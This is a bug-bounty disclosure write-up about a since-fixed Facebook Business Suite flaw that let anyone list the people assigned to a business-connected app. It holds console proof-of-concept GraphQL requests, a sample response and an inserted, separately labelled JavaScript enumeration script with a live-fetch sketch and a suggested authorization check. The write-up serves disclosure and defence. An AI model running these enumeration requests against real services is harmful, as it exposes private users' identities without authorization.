Disclosing the assigned users of any Facebook application connected to a business account

Gtm Mänôz
Published in PenTester Nepal
Apr 7, 2023

In mid-April 2021, I found a very new-looking UI of Facebook Business Suite in one of my test Facebook accounts. Within a second I found a new business assets section added to it.

While analyzing every request and response in the network tab of the dev tools, I found two GraphQL queries named “BizKitSettingsAssetAssignedPeopleModalQuery” and “BizKitSettingsAssetToUserConnectionListPaginationQuery” that were fetching the admin list of my page connected to the business account. At the time of reporting, the call for Facebook pages was secured but was vulnerable for the asset type apps.

Given only the target app's ID and the ID of the business it was linked to, it was possible to disclose the NonBusinessScopedPermittedUser entries (the people assigned to the app) of the targeted Facebook app, without holding any role on that app or business.

Proof of concept

Send the following GraphQL requests as AJAX calls from the browser's console window, replacing AppID with the target app's ID and linked_businessID with the ID of the business it is connected to:

BizKitSettingsAssetAssignedPeopleModalQuery:

new AsyncRequest('api/graphql/').setData({doc_id:3863660693680109,variables:'{"assetID":"AppID","businessID":"linked_businessID"}'}).send()

BizKitSettingsAssetToUserConnectionListPaginationQuery:

new AsyncRequest('api/graphql/').setData({doc_id:5596978093660601,variables:'{"assetID":"AppID","assetPermissionAccessType":null,"businessID":"linked_businessID","count":100,"cursor":null,"searchTerm":null,"id":"AppID"}'}).send()

Both queries returned the same response (identifiers redacted):

{
  "data": {
    "asset": {
      "__typename": "Application",
      "__isBusinessConnectedObjectWithPermittedUsers": "Application",
      "assigned_users": {
        "edges": [
          {
            "node": {
              "__typename": "NonBusinessScopedPermittedUser",
              "__isPermittedUser": "NonBusinessScopedPermittedUser",
              "name": "Facebook Name",
              "__module_operation_BizKitSettingsAssetToUserConnectionListItem_user": {
                "__dr": "BizKitSettingsAssetToNonBusinessScopedUserConnectionListItem_user$normalization.graphql"
              },
              "__module_component_BizKitSettingsAssetToUserConnectionListItem_user": {
                "__dr": "BizKitSettingsAssetToNonBusinessScopedUserConnectionListItem.react"
              },
              "id": "FBID"
            },
            "cursor": null
          }
        ],
        "page_info": {
          "end_cursor": "end_cursor",
          "has_next_page": true
        }
      },
      "__isBusinessObjectRenderedInUI": "Application",
      "assetID": "AppID",
      "assetName": "Facebook App Name",
      "assetPicture": "CDN_URL",
      "assetType": "APP",
      "__isNode": "Application",
      "id": "AppID",
      "businessAssetType": "APP"
    }
  },
  "extensions": {
    "is_final": true
  }
}

Impact

This could have let a malicious user disclose the full list of admins/developers (NonBusinessScopedPermittedUser) of any Facebook app connected to a business account, knowing only the app ID and the linked business ID. The root cause is a missing authorization check on the assigned_users connection for the APP asset type: the server returned the list without verifying that the caller had any role on the asset or its business, while the same check was already enforced for pages.
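To make the proof of concept and the missing check concrete, here is an added example that is not part of the original write-up or Facebook's code. It drives the pagination query described above the way a tester would (following end_cursor until has_next_page is false and collecting every NonBusinessScopedPermittedUser), and beside it shows the kind of authorization guard the resolver lacked for apps. The doc_id and variable names come from the write-up; the transport is injected so the logic runs offline against constructed sample pages, and the fetch sketch, the fb_dtsg token, the guard function and the sample data are assumptions.

```javascript
// Added example (not from the original post). Enumerates assigned users of an
// app via BizKitSettingsAssetToUserConnectionListPaginationQuery, and shows the
// authorization check that should have gated the response for assetType APP.

const PAGINATION_DOC_ID = 5596978093660601; // doc_id quoted in the write-up

// Build the `variables` string exactly as the write-up's AsyncRequest call does.
function buildVariables(appId, businessId, cursor, count = 100) {
  return JSON.stringify({
    assetID: appId,
    assetPermissionAccessType: null,
    businessID: businessId,
    count,
    cursor,
    searchTerm: null,
    id: appId,
  });
}

// Extract the user nodes and the next cursor from one response body
// (shape taken from the response shown in the write-up).
function parseAssignedUsers(body) {
  const conn = body?.data?.asset?.assigned_users;
  if (!conn) return { users: [], nextCursor: null };
  const users = conn.edges.map(({ node }) => ({
    id: node.id,
    name: node.name,
    type: node.__typename,
  }));
  const nextCursor = conn.page_info?.has_next_page ? conn.page_info.end_cursor : null;
  return { users, nextCursor };
}

// Walk every page. `send(docId, variables)` returns a Promise of the parsed JSON.
// A request cap guards against a server that keeps returning has_next_page: true.
async function enumerateAssignedUsers(send, appId, businessId, maxRequests = 50) {
  const all = [];
  let cursor = null;
  let requests = 0;
  do {
    const body = await send(PAGINATION_DOC_ID, buildVariables(appId, businessId, cursor));
    requests += 1;
    const { users, nextCursor } = parseAssignedUsers(body);
    all.push(...users);
    cursor = nextCursor;
  } while (cursor !== null && requests < maxRequests);
  return all;
}

// Hypothetical hardened side (not Facebook's code): the resolver for
// asset.assigned_users should refuse unless the caller holds a role on the
// asset's business or is already assigned to the asset. The bug in the
// write-up is this check being absent for apps while present for pages.
function canViewAssignedUsers(callerId, asset, businessRoles) {
  const hasBusinessRole = (businessRoles[asset.businessId] || []).includes(callerId);
  const isAssigned = asset.assignedUserIds.includes(callerId);
  return hasBusinessRole || isAssigned;
}

// Constructed sample pages shaped like the write-up's response (two pages).
function makePage(users, endCursor, hasNext) {
  return {
    data: {
      asset: {
        __typename: 'Application',
        assetType: 'APP',
        id: 'AppID',
        assigned_users: {
          edges: users.map(([id, name]) => ({
            node: { __typename: 'NonBusinessScopedPermittedUser', id, name },
            cursor: null,
          })),
          page_info: { end_cursor: endCursor, has_next_page: hasNext },
        },
      },
    },
    extensions: { is_final: true },
  };
}

const SAMPLE_PAGES = {
  start: makePage([['100001', 'Alice'], ['100002', 'Bob']], 'c1', true),
  c1: makePage([['100003', 'Carol']], 'c2', false),
};

// Offline transport serving the constructed pages keyed by cursor.
async function mockSend(docId, variables) {
  if (docId !== PAGINATION_DOC_ID) throw new Error('unexpected doc_id');
  const { cursor } = JSON.parse(variables);
  return SAMPLE_PAGES[cursor ?? 'start'];
}

// Against the live site the transport would look roughly like this (assumption;
// the write-up's AsyncRequest helper adds the fb_dtsg CSRF token itself):
//   const liveSend = (docId, variables) =>
//     fetch('/api/graphql/', { method: 'POST', credentials: 'include',
//       body: new URLSearchParams({ doc_id: String(docId), variables, fb_dtsg: '...' }) })
//       .then((r) => r.json());

enumerateAssignedUsers(mockSend, 'AppID', 'linked_businessID')
  .then((users) => console.log(users.map((u) => `${u.id} ${u.name}`).join('\n')));
```

The pagination loop is what turns a single leaked page into the complete admin list, which is why has_next_page in the response matters to the impact; the guard at the bottom is the check a tester should expect the server to apply before any edge of assigned_users is returned.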

Timeline

  • 22 Apr 2021 — Report sent to Facebook.
  • 22 Apr 2021 — Triaged after 4 hours of submission.
  • 15 Jul 2021 — Incomplete fix by Facebook.
  • 26 Aug 2021 — Bounty awarded by Facebook.
  • 20 Jan 2022 — Complete fix by Facebook.
  • 27 Jan 2022 — Double bounty awarded by Facebook for the incomplete fix, with a delayed-payout bonus.

After multiple duplicates and informative reports, this report turned out to be my first bounty reward from Facebook.

You know that feeling when you get your first bounty? 💰️

Your heart starts racing. You keep going back, chasing that feeling over and over again.🚀

Thanks for reading my write-up 🤗 Happy Hacking 🎭️

Thanks & best regards,
Gtm Mänôz
